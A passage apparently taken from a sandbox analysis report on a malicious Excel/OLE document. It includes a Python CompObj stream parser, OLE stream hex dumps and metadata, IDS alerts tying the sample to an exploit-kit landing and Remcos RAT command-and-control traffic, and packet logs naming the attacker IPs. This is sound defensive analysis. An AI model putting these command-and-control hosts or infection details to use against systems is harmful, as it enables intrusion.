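    "00020820-0000-0000-c000-000000000046": "Excel.Sheet.8 (BIFF8 workbook)",
    "0002ce02-0000-0000-c000-000000000046": "Equation.3 (Equation Editor 3.0, hosted by EQNEDT32.EXE)",
    "0003000c-0000-0000-c000-000000000046": "Package (embedded file)",
}

UNICODE_MARKER = 0x71B239F4   # announces the optional Unicode section


def _ansi_string(buf: bytes, off: int):
    """LengthPrefixedAnsiString: u32 byte count (NUL included) followed by the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("string runs past end of stream")
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def _clipboard_format(buf: bytes, off: int):
    """ClipboardFormatOrAnsiString: 0 = absent, 0xFFFFFFFF/0xFFFFFFFE = u32 format id,
    anything else is the length of a string such as "Biff8"."""
    (marker,) = struct.unpack_from("<I", buf, off)
    if marker == 0:
        return None, off + 4
    if marker in (0xFFFFFFFF, 0xFFFFFFFE):
        (fmt_id,) = struct.unpack_from("<I", buf, off + 4)
        return f"CF:{fmt_id}", off + 8
    return _ansi_string(buf, off)


def parse_compobj(data: bytes) -> dict:
    """Return version, CLSID, user type, clipboard format and ProgID of a CompObj stream."""
    if len(data) < 28:
        raise ValueError("CompObj stream shorter than its 28-byte header")
    (version,) = struct.unpack_from("<I", data, 4)
    # Header bytes 12..28 hold the object's CLSID in practice (the spec only calls
    # the 20-byte field after Version "Reserved2"); bytes 8..12 are 0xFFFFFFFF.
    clsid = str(uuid.UUID(bytes_le=data[12:28]))
    off = 28
    user_type, off = _ansi_string(data, off)
    clip_fmt, off = _clipboard_format(data, off)
    prog_id, off = _ansi_string(data, off)        # spec name: Reserved1, holds the ProgID
    has_unicode = False
    if off + 4 <= len(data):
        (marker,) = struct.unpack_from("<I", data, off)
        has_unicode = marker == UNICODE_MARKER
    return {
        "version": version,
        "clsid": clsid,
        "clsid_name": KNOWN_CLSIDS.get(clsid, "unknown"),
        "user_type": user_type,
        "clipboard_format": clip_fmt,
        "prog_id": prog_id,
        "has_unicode_section": has_unicode,
        "bytes_consumed": off,
    }


if __name__ == "__main__":
    for key, value in parse_compobj(bytes.fromhex(COMPOBJ_HEX)).items():
        print(f"{key}: {value}")
```

For this stream the parser yields CLSID 00020820-0000-0000-c000-000000000046, user type "Microsoft Office Excel 2003 Worksheet", clipboard format "Biff8" and ProgID "Excel.Sheet.8", which is what makes the Workbook stream below a BIFF8 worksheet regardless of what libmagic guesses. The same function on an Equation.3 object is a quick static tell for EQNEDT32.EXE abuse.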
                                                                                                                                General
                                                                                                                                Stream Path:\x1Ole
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:20
                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                General
                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                CLSID:
                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                Stream Size:55488
                                                                                                                                Entropy:3.128894440734097
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . l . . . . . . . g . . . . + . . . . . . . . . . . . . f . . Z G . . E M F . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 67 00 00 00 0d 2b 00 00 db 0c 00 00 00 00 00 00 00 00 00 00 66 b6 00 00 5a 47 00 00 20 45 4d 46 00 00 01 00 c0 d8 00 00 5b 07 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                General
                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:6
                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                Data Raw:00 00 03 00 01 00
                                                                                                                                General
                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                CLSID:
                                                                                                                                File Type:data
                                                                                                                                Stream Size:248
                                                                                                                                Entropy:2.7990677635209242
                                                                                                                                Base64 Encoded:True
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
General
Stream Path:\x5SummaryInformation
CLSID:
File Type:data
Stream Size:23536
Entropy:3.0728310684122637
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . [ . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . F ` . . . . . . . . . . . G . . . Z . . . . . . . . ( . . . . . . . . . . n - . . . . . . . . . .
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 5b 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 78 00 00 00 12 00 00 00 88 00 00 00 0b 00 00 00 a0 00 00 00 0c 00 00 00 ac 00 00 00 0d 00 00 00 b8 00 00 00 13 00 00 00 c4 00 00 00 11 00 00 00 cc 00 00 00
General
Stream Path:Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:28134
Entropy:4.264894359698655
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Has Summary Info:
Application Name:
Encrypted Document:False
Contains Word Document Stream:True
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:False
Flash Objects Count:0
Contains VBA Macros:False
Code Page:1252
Title:
Subject:
Author:91974
Keywords:
Template:Normal.dotm
Last Saved By:91974
Revision Number:4
Total Edit Time:1
Last Printed:2013-03-25 17:07:30
Create Time:2024-09-30T08:11:00Z
Last Saved Time:2024-09-30T08:12:00Z
Number of Pages:1
Number of Words:0
Number of Characters:0
Thumbnail:[binary thumbnail image data omitted]
Creating Application:Microsoft Office Word
Security:0
Document Code Page:1252
Number of Lines:1
Number of Paragraphs:1
Thumbnail Scaling Desired:false
Company:Grizli777
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:12.0000
General
Stream Path:\x1CompObj
CLSID:
File Type:data
Stream Size:114
Entropy:4.25248375192737
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:\x1Ole
CLSID:
File Type:data
Stream Size:20
Entropy:0.5689955935892812
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . .
Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:\x3EPRINT
CLSID:
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Stream Size:1301576
Entropy:4.041786466342239
Base64 Encoded:True
Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E M F . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 d6 1f 00 00 b1 1b 00 00 00 00 00 00 00 00 00 00 e7 86 00 00 08 c5 00 00 20 45 4d 46 00 00 01 00 48 dc 13 00 a3 09 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
General
Stream Path:\x3ObjInfo
CLSID:
File Type:data
Stream Size:6
Entropy:1.2516291673878228
Base64 Encoded:False
Data ASCII:. . . . . .
Data Raw:00 00 03 00 0d 00
General
Stream Path:\x5DocumentSummaryInformation
CLSID:
File Type:data
Stream Size:244
Entropy:2.701136490257069
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
General
Stream Path:\x5SummaryInformation
CLSID:
File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\362\352\347\373\363\356\367\362\360\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:90976
Entropy:3.617492259697482
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . . v
Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
General
Stream Path:MBD0018D4CE/\x1Ole
CLSID:
File Type:data
Stream Size:20
Entropy:0.5689955935892812
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . .
Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:data
Stream Size:4
Entropy:0.8112781244591328
Base64 Encoded:False
Data ASCII:. . . .
Data Raw:00 00 03 00
General
Stream Path:MBD0018D4CE/Contents
CLSID:
File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:197671
Entropy:6.989042939766534
Base64 Encoded:True
Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
General
Stream Path:Workbook
CLSID:
File Type:Applesoft BASIC program data, first line number 16
Stream Size:125121
Entropy:7.253073671715414
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T09:25:30.278282+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 104.168.7.8 | 80 | 192.168.2.22 | 49171 | TCP
2024-10-01T09:25:30.278282+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 104.168.7.8 | 80 | 192.168.2.22 | 49171 | TCP
2024-10-01T09:25:32.788889+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49172 | 103.186.116.99 | 58934 | TCP
2024-10-01T09:25:34.799977+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49174 | 178.237.33.50 | 80 | TCP
2024-10-01T09:25:34.988681+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49173 | 103.186.116.99 | 58934 | TCP
2024-10-01T09:29:07.807333+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49175 | 103.186.116.99 | 58934 | TCP
2024-10-01T09:29:08.088141+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49176 | 103.186.116.99 | 58934 | TCP
2024-10-01T09:29:15.578303+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.22 | 49177 | 103.186.116.99 | 58934 | TCP
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Oct 1, 2024 09:25:20.106848955 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.106858969 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.106888056 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107098103 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107147932 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107162952 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107196093 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107342958 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107389927 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107407093 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107443094 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107577085 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107621908 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107646942 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107683897 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.107783079 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.107831955 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:20.136852026 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.136887074 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.136944056 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.137264013 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.137280941 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.594293118 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.594510078 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.595812082 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.595820904 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:20.597127914 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:20.597131014 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422153950 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422209978 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422225952 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422256947 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422375917 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422391891 CEST44349168172.67.216.244192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.422400951 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422445059 CEST49168443192.168.2.22172.67.216.244
                                                                                                                                Oct 1, 2024 09:25:21.422795057 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.427527905 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.533859015 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.534043074 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.894107103 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.899092913 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:21.899265051 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.899398088 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:21.904496908 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366844893 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366871119 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366883039 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366889954 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366895914 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366903067 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.366950989 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.366997004 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367078066 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367127895 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367145061 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367156982 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367203951 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.367225885 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.367276907 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.371932983 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372024059 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372064114 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372066975 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372076035 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372087002 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.372107983 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.372128010 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.453707933 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.453782082 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454788923 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454847097 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454931021 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454941988 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454952002 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454961061 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454972029 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454977036 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.454982042 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454993963 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.454997063 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455004930 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455014944 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455018044 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455043077 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455060005 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455292940 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455303907 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455339909 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455367088 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455406904 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.455440044 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455451012 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.455481052 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456156969 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456206083 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456217051 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456228018 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456260920 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.456305027 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456316948 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.456351995 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457058907 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457108021 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457133055 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457181931 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.457194090 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.457236052 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.458615065 CEST8049169104.168.7.8192.168.2.22
